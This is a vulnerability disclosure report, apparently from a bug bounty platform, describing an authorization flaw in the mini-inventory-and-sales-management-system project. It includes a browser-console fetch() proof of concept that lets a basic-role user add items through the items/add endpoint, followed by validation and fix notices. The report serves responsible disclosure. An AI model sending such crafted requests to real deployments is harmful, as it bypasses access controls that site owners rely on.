Improper Privilege Management in amirsanni/mini-inventory-and-sales-management-system

Valid

Reported on

Jul 31st 2021

💥 BUG

unprivileged user can add item

💥 STEP TO REPDOUCE

1. From admin account goto https://1410inc.xyz/mini-inventory-and-sales-management-system/administrators and add new user callled user-B with basic role .
So, user-B cant add new item.
2. Now goto user-B account and here user-B cant see any item.
Now user-B execute bellow javascript code in browser console and it will add new item

await fetch("https://1410inc.xyz/mini-inventory-and-sales-management-system/items/add", {
    "credentials": "include",
    "headers": {
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0",
        "Accept": "*/*",
        "Accept-Language": "en-US,en;q=0.5",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
        "Sec-Fetch-Dest": "empty",
        "Sec-Fetch-Mode": "cors",
        "Sec-Fetch-Site": "same-origin"
    },
    "referrer": "https://1410inc.xyz/mini-inventory-and-sales-management-system/items",
    "body": "itemName=jijk&itemQuantity=1&itemPrice=20&itemDescription=hghhj&itemCode=hjgj",
    "method": "POST",
    "mode": "cors"
});

💥 IMPACT

user with Basic role can add item

Occurrences

Items.php L36

We have contacted a member of the amirsanni/mini-inventory-and-sales-management-system team and are waiting to hear back 2 years ago

Amir validated this vulnerability 2 years ago

ranjit-git has been awarded the disclosure bounty

The fix bounty is now up for grabs

Amir marked this as fixed with commit ba36f6 2 years ago

Amir has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation